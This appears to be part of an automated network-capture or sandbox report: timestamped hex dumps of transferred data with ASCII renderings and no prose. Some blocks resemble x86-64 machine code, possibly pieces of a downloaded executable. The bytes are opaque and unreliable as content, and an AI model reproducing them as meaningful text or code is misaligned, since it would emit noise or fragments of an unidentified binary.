                                                                                                                                                                                              2021-09-29 21:45:40 UTC56INData Raw: 1c 00 00 00 00 00 00 1b 1b 00 00 1e af 8e 66 48 8c 7c 9d f1 28 68 78 43 1e 16 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 46 01 76 92 dc 53 b0 25 10 c3 f0 25 e4 40 6d 51 b1 ef 95 00 00 00 00 1a 91 33 d1 44 8c 9e 1a 00 00 00 00 00 00 00 55 d7 d3 3b 47 6d 96 07 8c ab ff 67 25 6b ab 00 00 00 16 16 00 00 79 83 a7 b1 38 97 7a 00 00 18 18 20 20 00 00 00 00 00 00 0a c7 42 12 ec 18 50 9c 74 19 41 16 16 00 0a 44 1e ae a5 fd b1 00 00 00 00 00 ff ff 00 34 1a 5d 2e 13 66 d1 7d 78 32 10 76 25 46 00 1a 1a 00 00 1e 1e ff ff 00 00 00 00 ff ff 83 69 2c 3f aa d4 44 a2 00 00 1a 1a 00 00 00 00 20 20 00 00 1b 1b ff ff 1a 1a ff a1 86 2e 83 b0 ff 00 00 21 21 6a 61 9b d3 cc 52 af 5b a1 d1 d4 35 8d 88 2c bf e7 4e 52 00 00 00 00 21 21 00 00 d6 a2 96 ab f9 c5 ca 30 f4 fe c0
                                                                                                                                                                                              Data Ascii: fH|(hxCFvS%%@mQ3DU;Gmg%ky8z BPtAD4].f}x2v%Fi,?D .!!jaR[5,NR!!0
                                                                                                                                                                                              2021-09-29 21:45:40 UTC64INData Raw: 1e 1e 16 16 00 00 2f 78 cd 5a dc a7 9d 1b 0e 85 87 c6 04 ac 7b 82 1c b1 2b 1c 1c 00 00 00 00 1a 1a 00 00 1c 1c 00 00 00 00 ff ff 00 29 37 ae 43 ca fe 00 00 00 1a 1a 7d 7c 29 86 9d c3 6a c8 23 cd 68 f8 92 13 28 ff ff 1e 1e 17 17 00 00 ff d0 f7 53 24 1d 35 ff ff 00 00 00 00 ff 7e 42 8a 46 9a 35 cb c2 9c 74 ef ff 00 00 00 00 00 00 1c 1c fe fe 1e e3 ec 87 3e 83 f1 cf 1e 20 20 e8 be 15 e1 4c b4 b6 84 0a 40 94 23 88 e7 00 00 1b 1b 00 00 ff ff 0a 9d cb dc 4b 59 7a 08 20 20 18 18 00 00 00 00 00 00 00 00 00 00 1d 85 b7 3b 48 6f 1d ff ff 16 16 1f 1f 20 20 16 16 00 00 1b 1b 00 00 ff ff bf ac 8e fa 64 91 4e 32 a7 32 64 d7 ab 78 f2 2f 5f c5 82 00 00 ff ff ff 3e 7d 7e 19 39 8c 99 b6 5e ed 94 ee ff 00 00 00 00 19 19 00 a3 d2 cd 7c 5b d2 c5 ce 6e d2 2b 12 d3 be 58 dc c8
                                                                                                                                                                                              Data Ascii: /xZ{+)7C}|)j#h(S$5~BF5t> L@#KYz ;Ho dN22dx/_>}~9^|[n+X
                                                                                                                                                                                              2021-09-29 21:45:40 UTC72INData Raw: d2 83 89 d8 83 8b 24 8b 8b 4c 48 48 24 ff 00 00 10 24 65 cc 00 bc 8b 5c 8b c9 01 48 19 b2 d3 0f 24 cc 15 1f 8b 74 d3 38 08 7d 85 83 97 85 cc e8 48 ff 8b 75 8b ff cc ff 24 f0 ce c9 24 8b ff 26 89 9d ce 4c d9 cc 4d 01 18 24 a5 ec 8d ec 8b 40 8d c0 d0 fb 11 2b ff 84 56 c7 e8 49 00 47 8b 00 48 48 ff ff 15 ef 6d 20 8b 48 09 89 4c e9 fe 00 0f 00 83 7c 10 89 41 89 ff 75 eb 44 ff 00 48 48 48 bd ff 8d 8b 74 f7 cc 30 15 4c 3e 89 48 48 24 15 1f cc 00 38 0f 41 48 74 15 0f ff 57 c9 c6 48 27 ff 48 ff 89 24 15 24 00 8b 48 8d 8d 75 39 00 7f 8b 84 30 00 cc 00 a0 48 ff 48 ff 5f 48 ff 89 05 05 45 15 e0 89 8b 90 89 50 83 08 33 d9 5c e3 24 48 cc c3 24 ff 00 ff 15 48 b6 20 c8 84 23 00 43 40 48 cc 03 15 90 0d 8b 48 85 8d 00 24 4b 48 90 48 5d 8b 05 e0 c7 8b 15 3d 83 48 00 ff cc
                                                                                                                                                                                              Data Ascii: $LHH$$e\H$t8}Hu$$&LM$@+VIGHHm HL|AuDHHHt0L>HH$8AHtWH'H$$Hu90HH_HEP3\$H$H #C@HH$KHH]=H
                                                                                                                                                                                              2021-09-29 21:45:40 UTC80INData Raw: 00 00 20 20 00 00 29 69 af c4 c1 b2 b2 9d df fc 80 54 1e 1e 00 00 00 62 b6 46 2a a3 f1 a1 e7 e6 0b 94 49 b8 aa 26 e1 0b 6d 4e 00 1e 1e ff ff 20 20 00 1a ab 89 60 08 0d 00 ff ff 20 20 ff ff a3 ef 21 78 6b fc ab ec ec 6a 5a ad 5f b1 4b 00 00 00 00 00 00 00 00 fe fe 00 00 60 61 23 1d 88 b3 e5 ff ff 00 16 80 27 fb 15 ee 57 b8 2d 54 c8 00 00 00 16 16 00 00 00 c9 23 1c 29 ce c7 d9 00 00 00 1a 1a 00 00 00 00 00 00 00 00 00 00 4d ca a5 5f 93 1b 60 72 bd ee b5 e8 ac 8c 00 00 00 00 18 18 00 00 ff ff 00 00 00 00 00 00 00 00 00 87 a9 5a 98 45 56 24 16 00 16 16 00 00 1a 1f 93 c4 01 00 00 20 20 00 00 00 00 e0 4c 54 6c 49 a3 de e2 76 b1 3a 28 19 29 07 56 15 d7 bb 1f 1f 00 00 00 00 ff 80 91 14 10 aa e1 c5 ab 1f 12 ce 95 ff 00 00 00 00 00 00 00 00 00 00 00 2e be f7 68 65
                                                                                                                                                                                              Data Ascii: )iTbF*I&mN ` !xkjZ_K`a#'W-T#)M_`rZEV$ LTlIv:()V.he
                                                                                                                                                                                              2021-09-29 21:45:40 UTC88INData Raw: ff 21 21 00 98 e5 de 28 74 00 19 19 18 18 00 00 16 16 00 00 16 16 ff ff ff ff 16 16 b8 20 5e b7 91 f2 fc b8 ed 80 c4 e5 2d 43 d2 fc 05 41 d6 19 19 17 17 00 51 3e 6d b6 17 e9 d7 5c a4 06 ef 66 00 ff ff 00 00 21 21 ff 58 aa 3e 49 d5 6a 58 c5 6c 29 72 04 2d 75 91 37 f1 78 e3 ff 18 18 21 21 18 18 42 d0 52 d2 79 84 00 00 1b 1b 00 00 ff ff ff ff 00 00 2e a8 24 be c5 d8 f7 60 2b f0 42 06 0c 52 68 ff ff 1b 40 dd c3 aa 82 88 f8 1b 00 00 ff ff 00 00 ff 03 ef 86 f4 0d 0e 8c 57 85 1b 17 ff 00 00 19 19 00 00 00 00 17 17 20 20 21 21 7d 73 87 4e 36 76 bf 00 00 1e 1e 00 00 00 00 00 00 00 00 16 16 00 00 ff ff 1c 26 92 bb 16 21 d8 58 6d ac bc 25 30 d8 d8 1c 00 00 00 00 58 6a 28 3b 2b 01 82 ee 00 00 1c 1c ff ff ff ff f3 92 78 98 f0 19 19 00 00 ff ff 1a ad 90 0a 35 8c 21 97
                                                                                                                                                                                              Data Ascii: !!(t ^-CAQ>m\f!!X>IjXl)r-u7x!!BRy.$`+BRh@W !!}sN6v&!Xm%0Xj(;+x5!
                                                                                                                                                                                              2021-09-29 21:45:41 UTC96INData Raw: 97 6e 03 00 00 00 17 17 fe fe 17 05 49 d0 15 5e 2d bd b4 07 4e ee 5a 81 45 17 ff ff 18 18 ff ff ff ff 00 00 00 00 00 00 c7 2e 63 54 ce 0d 5d 42 00 00 00 00 00 00 00 00 00 00 1e 1e 1c 1c 1f 1f 00 00 16 81 88 c5 28 aa 16 00 00 00 00 4c 61 5c 28 9a 24 3e 46 51 d2 2d 24 42 fe 3a b0 54 10 4b 1a 1a 00 00 00 00 18 18 5c 82 0a 58 b3 bd 24 59 93 27 81 31 00 00 00 00 00 00 00 cd b4 02 1f 4f 42 c3 5e a2 2d bb 9a a1 e2 19 53 21 2d 3e 00 00 00 00 00 00 00 1e 1e ff ff 00 a6 66 cd bb ce fd 00 00 00 6c ff 48 ff 4d 3d 00 49 cc e8 ff 4c ff cc 89 01 eb 48 d0 e0 20 cc 74 8f 02 03 00 8b 30 10 4b 21 11 f1 00 24 8b 00 53 8d cc 00 8d 49 00 8b 48 f8 8b c4 58 d3 45 00 07 ff 83 08 24 00 c7 24 ff 20 15 ff 4c 18 5d 08 40 ff 03 20 8b 4f 53 2b 48 ff 00 48 3b 48 ff 45 45 48 74 c4 15 c3
                                                                                                                                                                                              Data Ascii: nI^-NZE.cT]B(La\($>FQ-$B:TK\X$Y'1OB^-S!->flHM=ILH t0K!$SIHXE$$ L]@ OS+HH;HEEHt
                                                                                                                                                                                              2021-09-29 21:45:41 UTC104INData Raw: 48 8b cc cc 8b e9 89 53 48 04 70 da 10 e8 54 48 cc d3 66 00 00 0f 1b 8b d2 8b 48 ff 48 01 20 48 40 55 24 ff 48 83 89 40 48 c3 3b 15 08 47 30 8b 48 ff 11 fc c0 45 fe 00 90 c1 ff 48 8b d2 3d 05 cc 5f d9 8b 8b ff 1f 15 08 89 10 00 00 49 24 24 cc 4b d9 4e 4c 00 48 83 08 48 33 cc 8d 8a 4d 89 e7 ff 89 d9 18 ff 89 8d 1c 43 49 00 0f 50 8d 48 89 48 8b 48 ff 8b 83 48 8b 06 00 48 73 4f 48 fc b6 44 8b 00 48 cc 18 89 89 50 ba 10 e2 65 00 00 5e 2d 64 15 4d 17 1a c8 28 00 f1 bf da 74 48 48 30 48 00 08 01 15 01 38 48 48 8d 8d c4 15 00 00 83 cd cc 75 24 ff 38 24 b9 d5 00 c7 01 be 1b 20 48 c9 00 ff 8b 8b 8b f0 07 00 74 20 48 8b fa 95 ff 08 00 8b 28 e9 d2 85 da 8b 48 bb 24 4c ff cc 19 c4 8b b6 ec c1 53 15 eb 48 2b db 28 8d 8d 75 4c ff 1a 1a ff ff 00 00 ff ff 00 00 ff ef 92
                                                                                                                                                                                              Data Ascii: HSHpTHfHH H@U$H@H;G0HEH=_I$$KNLHH3MCIPHHHHHsOHDHPe^-dM(tHH0H8HHu$8$ Ht H(H$LSH+(uL
                                                                                                                                                                                              2021-09-29 21:45:41 UTC112INData Raw: 00 00 00 00 1b 1b 1e 1e 00 00 e5 c1 5c 97 d7 88 b3 91 d1 7f 1b 2f 64 f8 52 88 94 ad 29 ff ff 00 00 00 00 00 00 1c 1c 00 00 ff ff 1a 1a ff ff ff e5 d6 62 de 5d c0 62 59 07 6a d8 cf ff 00 00 00 00 32 d0 92 db 82 39 e9 7e 50 de 3c 45 67 5a da 4c 0f 4d b1 00 00 00 00 00 00 16 16 9e 25 5f a8 2c 6f 20 20 ff ff 00 00 00 ae 97 ca d7 55 08 52 99 00 13 00 2c 28 2e 02 00 00 00 00 00 21 21 1a 1a 20 20 00 f2 e3 8f 00 6d fd 8c 00 16 16 6d ed d5 09 4b b0 e1 35 7c aa 41 20 20 00 00 ff ff 00 00 e6 c6 62 a8 33 a1 a4 00 00 00 00 00 00 ff ff 16 16 00 00 1c 1c 00 88 f3 ce ce cb d5 ff 25 e2 b5 41 22 ee e8 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 16 16 00 00 23 9c eb 12 02 96 e4 45 00 00 ff ff 00 d9 38 f4 db 0f 00 1c 1c 18 18 00 00 00 ce df 02 90 48 e7 9c ea 30 80 38 ba c9
                                                                                                                                                                                              Data Ascii: \/dR)b]bYj29~P<EgZLM%_,o UR,(.!! mmK5|A b3%A"#E8H08
                                                                                                                                                                                              2021-09-29 21:45:41 UTC120INData Raw: f1 43 8a 3d 92 8c 67 2e 78 0d fb 37 ee 00 00 00 00 00 00 00 00 8c e4 e6 7f 53 22 00 00 00 00 00 00 00 1a 1a ff ff ff ff 19 19 50 2a f6 69 90 00 0c 1e 49 a4 46 23 f6 ea 18 00 00 1b 1b 00 00 19 19 00 00 00 00 00 00 00 00 00 00 00 6c 33 b4 b5 4f 44 58 00 00 00 00 00 e7 ca 32 bd 34 cc 62 4a d3 ec c9 00 00 00 00 1b 1b 00 00 f1 0b 64 aa 2b 16 79 00 00 00 00 00 00 00 76 d3 23 00 20 0a f5 79 95 69 2c e3 89 99 00 ff ff 20 20 16 16 00 00 00 00 16 9b 3a c7 1e c1 4b 75 71 16 00 00 99 e1 47 94 95 00 00 18 18 21 21 00 00 87 57 f5 b8 8b 23 3a 99 6d 42 a5 e3 c3 d0 7a 9d 5a 17 e7 ff ff 00 00 1c 1c 00 00 17 17 00 00 00 00 20 40 09 5e 3f db 02 ae 4c b0 3c c1 c9 20 00 00 ff ff 21 21 00 00 00 00 00 00 1b 1b 00 00 ff ff bb 0f d5 14 d0 21 52 40 66 6a 7a dd 40 b3 a1 d1 e7 74 ec
                                                                                                                                                                                              Data Ascii: C=g.x7S"P*iIF#l3ODX24bJd+yv# yi, :KuqG!!W#:mBzZ @^?L< !!!R@fjz@t
                                                                                                                                                                                              2021-09-29 21:45:41 UTC128INData Raw: 1f ff 15 8b 44 ff e4 78 c7 ec be 48 48 90 00 fa cc 60 ec 8d 48 5a 48 02 48 c4 33 48 ff 8b 15 c1 c7 b9 ff cc c6 8b 70 ff 00 08 83 55 79 a7 8d 89 cc 48 00 c0 3b 5f 48 c4 10 48 74 48 50 d1 cc 15 24 b3 13 74 0c 00 75 f0 15 44 fd fb 8d 75 8d 00 8b cb 85 5d 8b 83 48 45 48 cc 44 33 74 83 48 60 00 48 8d d0 63 48 5b 01 40 83 00 89 48 54 15 48 24 cc 01 8b 48 73 83 4c 10 55 90 83 74 33 48 83 0a ff 02 24 4d 48 85 00 44 8b 48 00 8d 00 cb c1 00 c6 90 45 66 58 48 cc 11 45 40 f1 45 3d 48 00 2b 77 8f 49 6a 94 41 76 0f 8b 8b ff 03 48 95 39 89 ff 48 90 c0 ec 4c 8b 18 48 24 41 83 ff 48 15 83 33 cc 27 00 cc cc e8 84 cb 48 83 08 b8 4c c4 8b 48 8b 40 08 48 ff 48 83 0f 8b 8d d3 04 45 e0 8b 8b 03 00 05 24 48 00 22 9a 00 4d f4 58 4f 4e 48 cc 20 41 1c 00 15 48 8b 4b 48 8b 33 48 f1
                                                                                                                                                                                              Data Ascii: DxHH`HZHH3HpUyH;_HHtHP$tuDu]HEHD3tH`HcH[@HTH$HsLUt3H$MHDHEfXHE@E=H+wIjAvH9HLH$AH3'HLH@HHE$H"MXONH AHKH3H
                                                                                                                                                                                              2021-09-29 21:45:41 UTC136INData Raw: 91 f6 1e 86 00 00 00 ff ff ff ff 00 9d 24 c2 71 dd 7c 79 0d 09 1d 86 ba 85 a6 42 00 16 16 20 20 18 18 d6 7e c0 2c f6 06 17 00 00 ff ff 00 00 19 19 1e 1e ff ff e6 2c 05 38 d8 2a 88 cd 41 0c e6 00 00 00 f7 ec e3 1b ef 13 cd 00 1e 1e 00 00 16 16 ff a0 53 78 57 f0 34 cf 9d 77 b2 8c 99 f0 2c ff ff ff 20 20 00 00 1b 1b ff ff ff ff 00 00 52 af 83 74 e5 ba 59 bc 20 20 00 00 00 00 00 00 00 00 00 00 00 00 19 19 ff ff 00 e9 24 21 fa 6e 00 1b 1b ff ff 72 a5 3f 42 df 95 31 1c c1 ac f4 fa e5 b8 76 b6 4e 69 3a 00 00 00 00 1e 1e 00 00 ed ea cf a8 69 73 3f 7e 28 49 3a a3 00 00 00 00 00 00 00 bf 45 4b 1c 71 30 47 c7 a7 46 c8 46 77 9d b8 19 b6 c7 d3 90 d4 fb 8d 15 00 c9 5f 40 57 c6 e7 a8 4c 33 ff c0 4c cc c0 c9 2f 32 84 0f 27 c7 8b 8b 0c cc c7 89 74 48 24 cc 7d 50 83 24 30
                                                                                                                                                                                              Data Ascii: $q|yB ~,,8*ASxW4w, RtY $!nr?B1vNi:is?~(I:EKq0GFFw_@WL3L/2'tH$}P$0
                                                                                                                                                                                              2021-09-29 21:45:41 UTC144INData Raw: c9 48 4a 8b 8b 00 48 02 89 00 00 48 08 fe 8d 00 8b 1c 50 5e 1d 03 3a 00 00 ff 12 cc ff 18 ff 89 48 85 00 08 20 5b 40 89 00 ec 00 33 00 8b 48 00 ff ff ff 21 00 00 4d 47 8b 8b 01 28 48 8d c7 c5 48 44 10 83 ff 48 00 8b 18 48 89 0e fb b0 e8 00 8b 00 00 3b 00 f6 ff e8 ff 00 48 00 00 48 a7 fd 40 83 48 ff 48 da 00 11 04 46 89 48 48 d8 4c 48 20 48 18 00 00 cc 5f e3 d0 02 74 45 8d 64 24 48 48 00 8b 48 48 83 00 0f 90 cc 8b 8b cc c9 88 60 83 8b 5b 24 74 1b e0 25 03 01 89 9f 0f 8d 1f 14 00 cc 48 00 48 8b 44 2b 00 48 05 3b 25 5f 48 48 5c 48 c7 01 8b 4d ff 74 30 00 fb 48 48 4c cc 8b cd 8b 48 50 48 ff cc c0 24 ff e0 00 8b 1b cc 05 89 24 00 5c 74 00 8b 85 68 8b 2b 66 ff 24 8f 8b 4f ff ce 15 ff 5c 50 23 5c 83 00 48 83 f8 0a ff 24 00 50 fa 4d 15 fd 10 15 15 15 cc 15 24 48
                                                                                                                                                                                              Data Ascii: HJHHP^:H [@3H!MG(HHDHH;HH@HHFHHLH H_tEd$HHHH`[$t%HHD+H;%_HH\HMt0HHLHPH$$\th+f$O\P#\H$PM$H
                                                                                                                                                                                              2021-09-29 21:45:41 UTC152INData Raw: ff 20 20 21 21 16 16 16 16 ff ff ff ff 00 00 c9 14 27 bb 59 21 3b 31 ff ff 00 00 16 01 d6 6c 23 b8 16 00 00 00 00 00 00 00 7f 00 33 e1 76 90 82 4b 5d ce 7b 80 ff ef 1f 91 5c 86 1c 00 00 00 1e 1e 20 20 d2 42 fe 7e 2c 92 f9 ae ec 63 c0 ea 00 00 00 00 00 00 00 00 00 00 00 00 83 53 e2 3f a3 b5 27 ea ef 3a 9b 72 6c 90 b4 ca 9e 6e 5b 18 18 1c 45 73 8e c6 7e 6c 1c 1f 1f 00 00 00 00 00 81 85 2b d7 5a 9b 3d 09 82 7b d3 93 08 3c 1c 00 1a 1a 1f 1f 00 00 00 00 00 00 00 00 ff ff ef 1c b2 60 32 52 9b 00 00 00 00 00 00 1a 1a 00 00 00 00 1a 1a 00 00 20 20 00 aa 9f 20 4d 74 0f 4f 9a e5 28 98 00 1a 1a ff ff 3d 89 58 3f 42 6c 06 ff ff ff ff 00 00 00 00 da 60 d1 29 07 32 be d0 fe 83 6a 76 28 58 20 20 00 00 00 00 16 d5 c4 da 72 aa cd cf b2 16 ff ff 17 17 00 00 ff ff 00 00 00
                                                                                                                                                                                              Data Ascii: !!'Y!;1l#3vK]{\ B~,cS?':rln[Es~l+Z={<`2R MtO(=X?Bl`)2jv(X r
                                                                                                                                                                                              2021-09-29 21:45:41 UTC160INData Raw: 85 01 00 48 2f e8 40 33 00 73 00 ff 5b 0a 3b 0c ff c3 cc 75 c8 8c ff 24 48 40 c5 48 ff 4c ff e0 07 cc 92 18 24 8b 8b 73 00 50 f7 ff 00 fe 08 e0 48 d1 05 24 48 00 8b cc 74 20 bf ec 48 c0 de 5b 24 00 48 8b ff e2 cc 00 24 fd c4 d2 53 cb cc 48 48 44 91 55 8b 2f 4c 8b 57 83 c8 48 48 29 ff 04 41 ff f9 11 15 48 cc 48 05 28 08 4b 41 48 e8 8d 00 7c ff c0 4c 02 cc 48 50 84 24 cc 67 48 bc f0 83 48 cc c2 8d 55 8b 24 c0 c0 8d 78 05 57 00 48 08 00 9f d8 da 00 f5 b8 8d 49 4c 38 58 5c b6 07 8f 48 40 74 48 4c 48 8b ba 8b 48 ae 8b 04 ff 4c d0 44 21 ef 24 ff 33 e3 40 e8 08 80 8d 84 c6 d2 f0 ff fe d0 c7 89 19 e1 5f 89 24 07 00 20 c3 4c 8b 8d 15 00 48 49 8b cc cc 8b 8b 00 8d 3d 83 cc 00 cb 89 83 17 a1 4b 60 10 68 5c 47 38 01 d0 8d 24 48 97 5c 1f 74 30 4d 26 90 8b 0c 15 00 2d
                                                                                                                                                                                              Data Ascii: H/@3s[;u$H@HL$sPH$Ht H[$H$SHHDU/LWHH)AHH(KAH|LHP$gHHU$xWHIL8X\H@tHLHHLD!$3@_$ LHI=K`h\G8$H\t0M&-
                                                                                                                                                                                              2021-09-29 21:45:41 UTC168INData Raw: fb 57 24 df ff 43 d7 75 cc 8b 89 7f 8b 24 e8 40 5b 30 25 eb 00 ff 85 00 53 84 00 00 33 30 15 00 86 8d 27 89 48 30 5e ff 07 89 00 48 54 48 04 89 5c 15 ff 74 2b 2d 15 48 cc 18 74 48 4c 05 00 ff ff 00 00 00 c8 3a 12 be 46 a6 12 63 68 7d d3 48 58 20 00 ff ff 16 16 f7 a1 84 e2 b7 7b 8a e1 ff ff 00 00 ff ff ff ff 12 81 8f 9b e0 21 21 16 16 00 00 00 77 71 16 9d 12 12 5b fa 0a ad 1e f3 a6 da c5 cd 3a 59 d6 00 1a 1a 18 18 00 00 00 00 18 18 ff b2 19 ee e2 14 a6 36 f8 ef 36 26 e6 ff 1a 1a 83 30 10 45 d8 b9 66 93 9b 7b 01 a5 ee 24 91 e9 92 4c 9f ff ff 16 16 18 18 ff ff a6 c8 69 9b 05 c6 1c 1c 00 00 00 00 00 00 00 00 21 21 00 00 00 30 a5 e5 32 80 5f 14 65 76 ba 4c 2b 0e d0 96 00 00 00 00 00 fe fe 00 00 00 00 00 00 00 00 1b 1b ff ff dc f5 32 14 0b a7 22 1f 1f 00 00 00
                                                                                                                                                                                              Data Ascii: W$Cu$@[0%S30'H0^HTH\t+-HtHL:Fch}HX {!!wq[:Y66&0Ef{$Li!!02_evL+2"
                                                                                                                                                                                              2021-09-29 21:45:41 UTC176INData Raw: 48 ff 00 8b 90 cc 4f 83 ff 84 8d 00 8b ff 0a ff 10 0f 84 44 3b 8d 10 c3 48 74 04 ff c7 8b 30 8d 8b 8b 00 30 53 8d 15 28 48 cc 48 8d 00 90 6d 19 db 40 41 00 58 8b 58 cf 8b 5b cc 70 89 00 4c 89 8b 00 8b 01 83 eb 48 49 8b e7 90 8b 32 24 0e cc 15 3b c0 33 ff 48 8b 24 08 24 44 43 24 44 58 47 48 8d f0 01 89 c6 0c b1 79 ba f2 00 00 19 19 00 00 00 00 16 16 00 00 ff ff 00 a8 cd 8e ec 68 82 7e c7 9e 5d a1 86 ec 29 00 00 00 00 00 00 00 00 00 1e 1e 17 17 00 00 00 00 00 00 d3 db 85 81 23 ef 2f 76 16 16 21 21 00 f6 33 f7 6b bf 00 00 00 00 00 00 00 1b 05 c3 7a b4 94 4e 3a ba ea 78 13 92 4c f7 20 f8 57 7f b0 1b 00 00 00 00 00 00 73 52 66 f7 c6 58 f9 c0 1d 39 15 9f 00 00 ff ff 00 00 1c 1c 20 20 00 00 99 1d 6a 6d 8f 7c 66 c8 b0 f0 7f 08 4a 2c 05 12 16 ae 55 00 00 ff e9 6f
                                                                                                                                                                                              Data Ascii: HOD;Ht00S(HHm@AXX[pLHI2$;3H$$DC$DXGHyh~])#/v!!3kzN:xL WsRfX9 jm|fJ,Uo
                                                                                                                                                                                              2021-09-29 21:45:41 UTC184INData Raw: 1e 02 da 22 d1 1d bb 00 20 20 16 16 00 00 00 00 18 18 00 28 d3 1a 91 ce 98 96 00 00 00 14 9e be e8 e1 bb 74 c4 d3 89 79 fd 60 da 1b 1b 00 00 16 16 18 18 aa 13 35 b8 d7 4c fa b1 18 18 ff ff 00 00 1b 1b 00 00 20 20 00 00 00 4d 64 d4 9b 63 00 ff ff 00 00 00 00 1a 1a 19 19 00 00 ff ff 00 00 00 00 be 74 ae ea 96 cc 4b e3 eb 02 0e cc 5c 35 7f 29 9d e4 9c 1c 1c 1b 1b fe d3 eb a4 f4 6e 5b ee c8 06 92 e2 db fe 00 00 00 00 1b 1b 00 f1 ca e4 72 0c dc a3 1f 60 2d a2 9a ac ef 54 67 fd ec 0a 00 00 00 19 19 00 00 97 4d 6f 96 53 60 ff ff 00 00 ff ff 00 00 00 00 00 00 fd 28 63 e0 d1 b6 a2 28 2a 46 00 ab a1 b9 f2 00 00 ff eb ab ad 5e c0 11 67 ff 00 00 21 21 19 19 1e 9a 50 e9 26 89 41 db 84 45 6b c9 1e 00 00 00 00 00 00 1b 1b 20 20 00 00 1e 1e 59 1f e7 d0 da 76 c6 ff ff ff
                                                                                                                                                                                              Data Ascii: " (ty`5L MdctK\5)n[r`-TgMoS`(c(*F^g!!P&AEk Yv
                                                                                                                                                                                              2021-09-29 21:45:41 UTC192INData Raw: 48 44 8b 20 16 30 c4 8b f9 48 c6 f0 8b 00 47 02 4c 89 8b 00 03 44 36 2e 83 f6 4b 8d c8 8b 40 8d 09 0f 01 48 90 8b 00 74 bf b2 09 53 45 cc c9 cc 6c f8 00 48 e8 5e 48 48 00 ff 01 48 40 48 37 ab 28 48 22 48 49 00 00 ec 01 3b 0f 48 8d 10 10 45 40 48 ff 48 65 00 00 1d 2b 05 90 00 8b ff 10 c4 7c cc 24 ff 24 8b 75 8b 82 48 4d d1 eb 04 48 31 c3 e8 89 cc 4b cf 74 89 20 cc 8b 89 8b 44 30 70 39 8b 01 e0 48 2f 4d 20 ff 8b 4d 24 8d ff 48 66 1d 83 ff 7f 54 15 ee 48 74 56 54 20 ec 4c 48 08 60 75 17 00 8d 08 ff 74 f6 ff f0 44 4b 1a 40 4c 90 c0 48 0a 08 cc 16 c3 24 5e 10 cc 24 0f 00 48 c3 ff ec 02 8b e8 c1 48 48 48 15 10 74 e9 8d c7 30 02 fb 48 89 00 5e 89 4c 8b 00 8b 48 41 63 50 44 15 60 ff 84 1d 59 48 cc 33 66 e8 10 48 d7 45 10 8b 8d 24 ff 48 89 74 8b 48 c3 48 48 31 ff
                                                                                                                                                                                              Data Ascii: HD 0HGLD6.K@HtSElH^HHH@H7(H"HI;HE@HHe+|$$uHMH1Kt D0p9H/M M$HfTHtVT LH`utDK@LH$^$HHHHt0H^LHAcPD`YH3fHE$HtHHH1
                                                                                                                                                                                              2021-09-29 21:45:41 UTC200INData Raw: 02 89 fc 19 48 ff 48 24 4d ff 6d 38 60 48 00 8d ed 8b 00 01 94 89 30 48 48 03 56 8b 15 8d 8b 24 c0 c3 60 99 44 48 24 02 03 48 75 d0 8b 78 48 78 12 e0 48 ff 01 8b 48 ff 83 48 00 c8 d4 75 8b 11 30 02 00 cc 89 48 8b 10 20 ff 45 1f 20 48 60 8b 48 24 b7 d9 15 cc 66 60 8d c2 c3 5c 01 00 89 8d 8b 5e ed 8f 15 8d 48 44 4d c9 cc 4c 63 03 15 48 c7 cc c6 4c 5c bd 24 cc 83 b8 c3 ff ff 1f 80 53 5e 00 8b 48 0c 00 ff f7 48 0f d8 65 4c 49 53 74 8d 15 04 cc 24 ff 1f 00 4c 5c 4c 12 f8 ff 24 64 41 4d 48 66 cf 03 8d ec 48 60 8b 8b 8b ff ff 85 b7 1c ff 31 db 12 06 62 48 45 33 48 5c 0c 0f b9 4c 43 0b 00 15 00 01 24 ff 89 00 15 4c 48 00 48 c4 0c de 24 8d 1b 48 48 48 e8 63 74 3e 30 48 00 00 00 00 5c 00 40 00 7f 90 8d 74 fb 08 cf 00 15 48 d0 0c 5e eb 28 48 69 cb 03 83 c3 00 18 ff
                                                                                                                                                                                              Data Ascii: HH$Mm8`H0HHV$`DH$HuxHxHHHu0H E H`H$f`\^HDMLcHL\$S^HHeLISt$L\L$dAMHfH`1bHE3H\LC$LHH$HHHct>0H\@tH^(Hi
                                                                                                                                                                                              2021-09-29 21:45:41 UTC208INData Raw: 84 4d 00 db 00 c4 c7 8b b9 48 c3 cc 44 4c 01 8b ff 3b 8b fe 48 8f 15 6c 8b 10 95 d1 82 00 50 57 c0 f8 83 50 75 8b e9 ff c7 8d ff 84 4c 90 48 00 bb 89 ff 00 b6 8b 1f 00 56 74 48 03 11 00 89 c3 9c 48 5c 60 4c 8d 89 c0 48 1b 49 1b 18 00 00 44 ff 00 ff 15 4e 83 89 00 8d 85 74 15 24 05 08 5f ff 00 8b 48 b1 8d 5d 89 0f df 27 03 8b 15 00 48 cf 74 8b 8d ec a0 c8 00 30 bf 58 c6 48 89 ff 06 38 48 cf 8b 8b 10 89 57 cc ff 44 f9 3b 08 00 3b 8b 05 00 8d 53 f1 07 48 00 32 48 85 00 00 ec 24 74 ff 50 00 01 da 5c ff 24 ff e9 8b fb 01 74 04 48 c7 83 52 7c 03 3d 40 36 8d 3d 00 5b 15 84 0f 15 ac 00 8b 48 45 00 ff 00 9e 8b ec 90 cc 5c 04 00 e0 48 ff ff e8 81 83 48 8d f9 ff f9 ff 17 33 00 48 78 15 48 00 00 8d 4c 48 24 00 8b 90 5d 00 48 41 8f cc 45 01 48 83 48 00 c0 30 8b 00 28
                                                                                                                                                                                              Data Ascii: MHDL;HlPWPuLHVtHH\`LHIDNt$_H]'Ht0XH8HWD;;SH2H$tP\$tHR|=@6=[HE\HH3HxHLH$]HAEHH0(
                                                                                                                                                                                              2021-09-29 21:45:41 UTC216INData Raw: ea c9 df 3b 70 17 48 00 ec cc 30 0d 48 8b 48 c4 01 30 54 cb 07 8b 0c 5c 4f 89 00 4a ff cc 28 23 c4 e8 48 48 90 00 cc 15 41 27 8b 00 44 f7 85 85 d9 74 48 cb fd 4d 89 48 00 1d f0 85 24 ff e0 c9 cc 48 28 48 ee 15 24 7f 00 b4 15 cc 48 03 ff 90 48 00 cc 8b 7b 24 30 65 bf 89 d0 f0 00 b8 cc 75 48 75 48 8d 1f 30 48 44 20 8b af 89 33 49 39 44 e0 f6 89 4c 58 30 8b 8d a0 48 03 54 60 90 eb 48 c0 00 0f 48 16 c7 27 00 24 48 89 48 00 e7 08 cf 04 48 40 05 00 e8 a1 8b 89 ff 8d 10 12 00 d2 c0 13 ee ac 50 48 ff 00 5e e8 24 33 cc 48 ff 15 8b 48 57 75 00 5e cc 49 10 8b 84 d2 23 48 ff 04 ff 48 00 f8 48 c6 b6 44 